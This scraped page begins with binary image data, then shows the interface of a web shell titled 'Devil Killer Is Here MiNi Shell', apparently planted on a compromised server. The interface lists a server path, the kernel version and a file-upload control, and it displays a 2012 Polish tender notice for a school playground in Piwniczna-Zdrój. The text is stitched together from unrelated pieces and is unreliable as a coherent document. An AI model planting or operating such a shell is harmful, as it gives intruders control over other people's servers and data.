JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120822/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120822/181385-N-2012.html

<p class="kh_header"><b>Piwniczna-Zdrój: Utworzenie szkolnego placu zabaw przy Szkole Podstawowej nr 2 w Piwnicznej- Zdroju w ramach Programu Rządowego Radosna Szkoła</b><br>
<b>Numer ogłoszenia: 181385 - 2012; data zamieszczenia: 22.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Piwniczna-Zdrój , ul. Rynek 20, 33-350 Piwniczna-Zdrój, woj. małopolskie, tel. 0-18 4464043, faks 0-18 4464186.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piwniczna.pl baner BIP link Zamówienia publiczne</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie szkolnego placu zabaw przy Szkole Podstawowej nr 2 w Piwnicznej- Zdroju w ramach Programu Rządowego Radosna Szkoła.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest  utworzenie szkolnego placu zabaw dla dzieci wyposażonego w ramach programu rządowego  RADOSNA SZKOŁA  na części działki  nr ewid. 4405  położonej w Piwnicznej Zdrój. Zamierzenie budowlane realizowane będzie jako  mały plac zabaw  w ramach programu rządowego Radosna Szkoła  zgodnie z uchwałą Nr 112)2009 z dnia       7 lipca 2009 r. i Rozporządzeniem Rady Ministrów z dnia 7 lipca 2009 r. 
        powierzchnia placu zabaw                301  m2  
w tym;
powierzchnia bezpieczna                   164 m2
powierzchnia ścieżki                           20 m2
        powierzchni zieleni                           117 m2


Pod urządzeniami placu zabaw na powierzchni 164 m2  projektuje się specjalistyczną tzw. nawierzchnie bezpieczną, amortyzującą upadek z wysokości. Projektowana nawierzchnia piankowa lub gumowa do stosowania na zewnątrz, zgodnie z Polskimi Normami PN-EN 1176-1:2009 i PN-EN 1177:2009,przepuszczalna dla wody ( na całej powierzchni lub poprzez szczeliny płytek),musi być w kolorze pomarańczowym w odcieniu PANTONE: 152 C, RAL:2011 Tieforange ułożona z kształtek, tworzących nieregularny układ powierzchni. Montowana ściśle wg wytycznych producenta, na podbudowie utwardzonej, umożliwiającej wsiąkanie lub odprowadzenie wody opadowej z zachowaniem spadku 2%.Obrzeże krawężniki gumowe, montowane zgodnie              z instrukcja producenta. 
Zgodnie z załącznikiem nr 2 do Rozporządzenia Rady Ministrów z dnia 7 lipca 2009 roku w sprawie form i zakresu finansowego wspierania organów prowadzących w zapewnieniu bezpiecznych warunków nauki, wychowania i opieki w klasach I-III szkół podstawowych i ogólnokształcących szkół muzycznych I stopnia (Dz. U. Nr 110, poz. 915) nawierzchnia, na której zostanie zainstalowany sprzęt rekreacyjny, amortyzuje upadek dziecka z wysokości do 1,50 m. Rozporządzenie nie reguluje szczegółowo kwestii wysokości urządzeń rekreacyjnych, zastrzega jednak, aby były zgodne z Polskimi Normami. Zapis dotyczący wysokości swobodnego upadku do 1,50 m jest podyktowany bezpieczeństwem dzieci. W opinii Ministerstwa Edukacji Narodowej, zapis ten wskazuje, że cała nawierzchnia, na której zostanie zainstalowany sprzęt rekreacyjny, powinna amortyzować upadek dziecka z wysokości do 1,50 m, nawet jeśli sprzęt rekreacyjny jest niższy niż 1,50 m. Natomiast pod urządzeniami o wysokości swobodnego upadku powyżej 1,50 m, zgodnie z Polskimi Normami, nawierzchnia amortyzująca upadek powinna być dostosowana do wysokości swobodnego upadku urządzenia. W związku                    z powyższym, w ramach Programu Radosna szkoła dopuszczalne jest zainstalowanie na placu zabaw urządzenia o wysokości swobodnego upadku wyższej niż 1,50 m, pod warunkiem dostosowania pod urządzeniem nawierzchni amortyzującej upadek do wysokości urządzenia. Wymóg zastosowania nawierzchni amortyzującej upadek dziecka z wysokości do 1,50 m nie oznacza, że nie można zastosować nawierzchni amortyzującej upadek z wyższej wysokości.

          Projektuje się ścieżkę o powierzchni 20 m2 z  nawierzchni syntetycznej typu tartan lub inną nawierzchnię syntetyczną  do stosowania na zewnątrz, w kolorze niebieskim w odcieniu PANTONE: 540 C, RAL: 5003 - Saphirblau, zgodnie z Polskimi Normami PN-EN 1176-1:2009 i PN-EN 1177:2009. Nawierzchnia projektowanej ścieżki musi być przepuszczalna dla wody (na całej powierzchni lub poprzez szczeliny płytek),montowana ściśle wg wytycznych producenta na podbudowie utwardzonej, umożliwiającej wsiąkanie lub odprowadzenie wody opadowej z zachowaniem spadku poprzecznego 2%. Obrzeże - krawężniki gumowe, montowane  zgodnie z instrukcją producenta.




2.1 Mały plac zabaw będzie wyposażony w następujące urządzenia:


Lp.	Wymóg minimalny
1	1.	Zestaw do zajęć ruchowych - 1 szt.Funkcjonalność urządzenia: - wiszenie - wspinanie - odgrywanie ról - skakanie - zjeżdżanie - integracjaNa zestaw składają się:-podest z daszkiem,- siatka trapezowa-drabinka-siatka wspinaczkowa-drabinka boczna  - 2 szt-słupek strażacki                   - wymiary urządzenia: nie mniej niż dł. 6,2m, szer. 5,2m, wys. 3,4m - strefa bezpieczeństwa: nie mniej niż 8,7x9,08mMateriał wykonania : Pionowe słupy, wymiary 95x95mm, z drewna klejonego warstwowo. Stopy do słupów ze stali galwanizowanej. Daszki i ścianka wspinaczkowa ze sklejki (składającej się z warstw drewna iglastego) o grubości nie mniej niż 22mm pokrytej żywicą poliuretanową (zapewniającą jej wytrzymałość i odporność na promienie ultrafioletowe). Podest ze sklejki (składającej się z kładzionych na przemian warstw drewna liściastego i iglastego) o grubości 22mm pokrytej antypoślizgową żywicą. Powierzchnia zjeżdżalni pokryta nieprzerywaną warstwą stali nierdzewnej o grubości nie mniej niż 2mm. Elementy rurowe, średnica nie mniej niż 40mm, ze stali nierdzewnej. Uchwyty do wspinaczki wykonane z  poliamidu zapewniającego wytrzymałość i sztywność. Siatka wspinaczkowa wykonana z kabla ze stali galwanizowanej pokrytej polipropylenem. Wszystko zmontowane za pomocą śrub ze stali nierdzewnej okrytych poliamidowymi nasadkami.
2	Huśtawka - 1szt.Funkcjonalność urządzenia: - bujanie - integracjaHuśtawka przeznaczona jest dla kilkorga dzieci w której mogą się wspólnie bujać. Siedzisko huśtawki w formie miski. - wymiary urządzenia: nie mniej niż dł. 3,76m, szer. 3,16m, wys. 2,68m - strefa bezpieczeństwa: nie mniej niż 9,03x4,46mMateriał wykonania:Poprzeczna belka wykonana z klejonego warstwowo drewna. Nogi, o średnicy nie mniej niż 60mm, ze stali galwanizowanej. Nieprzerywana powierzchnia siedziska wykonana z odlewanego rotacyjnie polietylenu. Osadzona na ramie ze stali nierdzewnej osłoniętej elementami z PVC. Siedzisko zawieszone na łańcuchach pokrytych termokurczliwym polietylenem. Mocowania przy siedzisku, wykonane ze stali nierdzewnej, wyposażone w pierścienie z PVC, które ograniczają zużycie elementów metalowych. Zawieszenie huśtawek wykonane ze stali nierdzewnej.
3	BujakFunkcjonalność urządzenia: - bujanie - balansowanie - miejsce spotkań - wymiary urządzenia: nie mniej niż  dł. 1,15m, szer. 0,47m, wys. 0,76m - strefa bezpieczeństwa: Nie mniej niż 3,88x2,43m     Urządzenie powinno umieszczone zostać na sprężynie. Po środku znajdować się musi dodatkowe siedzisko, w celu umożliwienia interakcji między trzema osobami        Materiał wykonaniaSiedzisko wykonane z kompozytu (składającego się w nie mniej niż 70% z włókien drewnianych i w nie mniej niż 30% z żywicy termoutwardzalnej) o grubości nie mniej niż 13mm. Uchwyty i oparcia dla nóg wykonane ze stali nierdzewnej o średnicy nie mniej niż 40mm. Złączenia i nasadki wykonane z odlewanego poliamidu, nietoksyczne i odporne na ciepło, wstrząsy i promienie UV. Sprężyny wykonane z wysokiej jakości piaskowanej stali, pokrytej cynkiem i podwójną warstwą proszkowej farby epoksydowej. Mocowania sprężyn wykonane wytrzymałego poliamidu Wszystko zmontowane jest za pomocą śrub ze stali nierdzewnej okrytych poliamidowymi nasadkami. 
4	Deska balansującaFunkcjonalność urządzenia: - balansowanie - skakanieDeska balansująca o falistym kształcie mocowana na rurach ze stali nierdzewnej. - wymiary rury: nie mniej niż dł. 1,5m, szer. 0,2m, wys. 0,4m - strefa bezpieczeństwa: nie mniej niż 4,54x3,18mMateriał wykonaniaNogi wykonane z rury ze stali nierdzewnej o średnicy nie mniej niż 40mm.Deska do balansowania wykonana ze sklejki (składającej się z warstw drewna liściastego) o grubości 22mm pokrytej antypoślizgową żywicą fenolową.
5	Stopnie balansujące.Funkcjonalność urządzenia: - balansowanie - skakanieUrządzenie zbudowane z panelu pionowego wspartego na nogach ze stali nierdzewnej,  na którym posadowione są okrągłe stopnie  w ilości ok. 5 szt. - wymiary rury: nie mniej niż dł. 1,5m, szer. 0,2m, wys. 0,4m - strefa bezpieczeństwa: nie mniej niż 4,54x3,18mMateriał wykonania;Nogi wykonane ze stali nierdzewnej o średnicy nie mniej niż 40mm, na górze nałożone nasadki aluminiowe. Pionowy panel i stopnie wykonane ze sklejki (składającej się z warstw drewna liściastego) o grubości nie mniej niż 22mm; stopnie zostały pokryte warstwą antypoślizgowej żywicy fenolowej.Wszystko zmontowane za pomocą śrub ze stali nierdzewnej osłoniętych poliamidowymi nasadkami.


2.2	Wyposażenie małego placu zabaw w elementy dodatkowe

Lp.	Wymóg minimalny
1	Ławka z oparciem zgodna z normami w zakresie szczelin i otworów, bez ostrych krawędzi. Konstrukcja stalowa rurowa, malowana proszkowo, siedzisko  i oparcie                  z tworzywa lub drewna impregnowanego próżniowo ciśnieniowo, trwale zakotwiona            w gruncie wg instrukcji producenta. Stylistyka ławki powinna nawiązywać do konstrukcji innych elementów placu zabawa; wymaga się, by wybrany przez wykonawcę model zyskał akceptację Inwestora. Proponuje się aby konstrukcja ławki umożliwiała pozostawienie odzieży przez dzieci korzystające z palcu zabaw.- wymiary: nie mniej niż:  dł. 1,8m, wys. 0,59m, gr. 0,79m
2	Kosz na śmieci - powinien być dopasowany pod względem wizualnym do pozostałych urządzeń placu zabaw - forma i kolorystyka do uzgodnienia z Inwestorem.
3	Tablica informacyjna przy wejściu na plac zabaw z regulaminem, informacjami                                i oznaczeniami graficznymi wg wzoru określonego przez MEN w programie  Radosna Szkoła . Na tablicy powinien znajdować się regulamin określający warunki i zasady korzystania z placu zabaw oraz napis o treści:  Szkolny plac zabaw wyposażony w ramach programu rządowego  RADOSNA SZKOŁA . Na tablicy powinna pojawić się informacja      o numerze dyrektora szkoły lub osoby przez niego upoważnionej do opieki nad placem oraz numery telefonów alarmowych. Szczegółowa treść regulaminu powinna być uzgodniona z Inwestorem. Tablica powinna być dopasowana pod względem wizualnym do pozostałych urządzeń placu zabaw - forma i kolorystyka do uzgodnienia z Inwestorem.
4	Ogrodzenie placu zabaw           Zakłada się możliwość wygrodzenia terenu placu zabaw z wykorzystaniem istniejącego ogrodzenia od strony drogi powiatowej. Proponuje się zastosowanie np. siatki stalowej metalowej ażurowej powleczonej tworzywem PCV w kolorze zielonym o wysokości do 1,50 m umocowanej na słupkach betonowych lub stalowych zakotwionych w gruncie.                            Od strony wejścia wykonać furtkę  o szerokości 1,50 m (skrzydło główne o szerokości 1,00 m).


2.3 Wszystkie oferowane materiały są  fabrycznie nowe, nieregenerowane, wolne od wad fizycznych                          i prawnych, nie mają do nich praw osoby trzecie oraz nie jest przedmiotem żadnego postępowania                              i zabezpieczenia.
2.4  Montaż projektowanych urządzeń i elementów placu zabaw musi odbywać się ściśle wg wytycznych producenta, zgodnie z Polską Normą PN-EN 1176-1:2009.Wszystkie urządzenia i elementy wyposażenia placu zabaw muszą być fabrycznie nowe wykonane z bezpiecznych i trwałych materiałów i posiadać atesty oraz certyfikaty bezpieczeństwa. Przy lokalizacji obiektów należy zachować wymagane pasy bezpieczeństwa określone przez producenta. 
2.5 Sprzęt rekreacyjny powinien posiadać co najmniej trzyletni okres gwarancji, powinien być wykonany z bezpiecznych i trwałych materiałów, powinien być zgodny z Polskimi Normami oraz z warunkam                                    i bezpieczeństwa określonymi w szczególności w przepisach o ogólnym bezpieczeństwie produktów oraz przepisach w sprawie bezpieczeństwa ihigieny w publicznych i niepublicznych szkołach i placówkach.
Przy każdym urządzeniu zamontowanym na placu zabaw powinny być umieszczone tablice informacyjne pokazujące możliwości i sposób wykorzystania każdego urządzenia.
2.6 Usytuowanie obiektów wraz z zagospodarowaniem działki przedstawiono na załączonym planie zagospodarowania terenu opracowanym na mapie sytuacyjno-wysokościowej do celów projektowych w skali 1:500 oraz 1:200.
2.7 Zakres robót należy wykonać w oparciu o załączony projekt zagospodarowania terenu(działki) dla obiektu pt. Plac zabaw dla dzieci Radosna Szkoła, sporządzoną przez  inż. Włodzimierz Rec. Inwestycja jest realizowana na podstawie zgłoszenia zamiaru rozpoczęcia robót.
2.8 Zadanie ma spełniać wszystkie warunki określone Rozporządzeniem Rady Ministrów z dnia 7 lipca 2009 r. w sprawie form i zakresu finansowego wspierania organów prowadzących w zapewnieniu bezpiecznych warunków nauki, wychowania i opieki w klasach I-III szkół podstawowych i ogólnokształcących szkół muzycznych I stopnia
oraz powinno być realizowane zgodnie z uchwałą Nr 112)2009 z dnia        7 lipca 2009 r. w sprawie Rządowego programu wspierania w latach 2009-2014 organów prowadzących w zapewnieniu bezpiecznych warunków nauki, wychowania i opieki w klasach I-III szkół podstawowych i ogólnokształcących szkół muzycznych                   I stopnia - Radosna szkoła
2.9 W przypadku, gdy w projekcie zagospodarowania opisano materiały lub urządzenia za pomocą podania nazwy ich producenta, patentów lub pochodzenia, to w odniesieniu do tych materiałów lub urządzeń Zamawiający dopuszcza materiały lub urządzenia równoważne. Ujęcie w ofercie, a następnie zastosowanie równoważnych materiałów lub urządzeń może mieć miejsce pod warunkiem posiadania przez nie parametrów nie gorszych niż materiały lub urządzenia, które one zastępują oraz że są zgodne i adekwatne z dokumentacją opisującą przedmiot zamówienia, a w szczególności dokumentacją projektową i techniczną i odpowiadają zastosowanym  rozwiązaniom technologicznym. W takiej sytuacji Zamawiający wymaga udowodnienia przez Wykonawcę tego faktu, a w szczególności  złożenia stosownych dokumentów, potwierdzających, że te materiały lub urządzenia są równoważne.
2.10 Wykonawca zobowiązany jest do dokonania wizji lokalnej miejsca lokalizacji placu zabaw, zapoznania się z przedmiotem zamówienia oraz zawarcia w cenie oferty wszystkich kosztów za roboty niezbędne do prawidłowego ich wykonania, zgodnie z technologią robót określoną Polską Normą oraz Warunkami Technicznymi Odbioru Robót

3. Nazwy   kody określone dla przedmiotu zamówienia we Wspólnym Słowniku Zamówień

 45212000-6 Roboty budowlane w zakresie budowy wypoczynkowych, sportowych, kulturalnych, hotelowych           i restauracyjnych obiektow budowlanych
45214100-1 Roboty budowlane w zakresie budowy przedszkolnych obiektów budowlanych
45111000-8 Roboty w zakresie burzenia, roboty ziemne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.20.00-6, 45.21.41.00-1, 45.11.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 2000,00, słownie: dwa tysiące złotych słownie.
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)	w pieniądzu, przelewem na rachunek bankowy: 
 BS Piwniczna 62 8813 0004 2001 0000 7100 0001  z adnotacją wadium - Utworzenie szkolnego placu zabaw przy Szkole Podstawowej nr 2 w Piwnicznej- Zdroju w ramach Programu Rządowego Radosna Szkoła 
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)	w gwarancjach bankowych, 
4)	w gwarancjach ubezpieczeniowych 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) 
w terminie 2012-09-07, sposób przekazania: sposób przekazania

4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę realizacji co najmniej 1 roboty budowlanej polegającej na budowie)odbudowie)przebudowie)remoncie placu zabaw o wartoście nie mniejszej niż 70 000,00 złotych (brutto) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli dysponuje lub będzie dysponować osobami, które będą wykonywać zamówienie (kierować robotami budowlanymi) posiadającymi uprawnienie  budowlane w specjalnośic  konstrukcyjno -budowlanej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę -posiadanie środków finansowych lub zdolności kredytowej              w wysokosci nie mniejszej niż 70 000,00 zł oraz posiadanie ubezpieczenia od odpowiedzialnosci cywilnej               w zakresie prowadzonej działalności na kwotę nie mniejszą niż      70 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

